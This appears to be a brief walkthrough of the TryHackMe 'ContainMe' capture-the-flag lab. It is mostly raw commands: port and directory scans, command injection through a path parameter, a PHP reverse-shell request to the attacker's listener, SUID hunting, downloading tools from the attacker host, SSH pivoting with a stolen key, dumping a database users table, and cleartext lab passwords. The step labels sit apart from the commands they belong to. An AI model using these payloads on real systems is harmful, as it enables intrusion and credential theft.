Room Link: https://tryhackme.com/room/containme1
Kali
nmap -A $VICTIM
Kali
Kali
Burp Request
Kali
Burp Request
Get autocomplete
Victim
Kali
Victim
Mike has a ssh key so I tried logging into the other server with that and it worked.
Victim
Victim
Password was password, just guessed it.
Victim(mysql)
Victim
Victim
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtGET /index.php?path=;id HTTP/1.1
Host: 10.10.108.33
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1nc -lvnp 1337GET /index.php?path=;php+-r+'$sock%3dfsockopen("$KALI",1337)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.128.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgfind / -perm -u=s -type f 2> /dev/null
/usr/share/man/zh_TW/crypt mikegit clone https://github.com/andrew-d/static-binaries.git
cd static-binaries/binaries/linux/x86_64
python2 -m SimpleHTTPServer 81cd /tmp/
wget http://$KALI:81/nmap
chmod +x nmap
./nmap 172.16.20.0/24 -Pnssh mike@172.16.20.6 -i /home/mike/.ssh/id_rsass -ltp mysql -ppassword
show databases;
use accounts;
select * from users ;su root
Password: bjsig4868fgjjeogcd /root
unzip mike.zip
Password: WhatAreYouDoingHere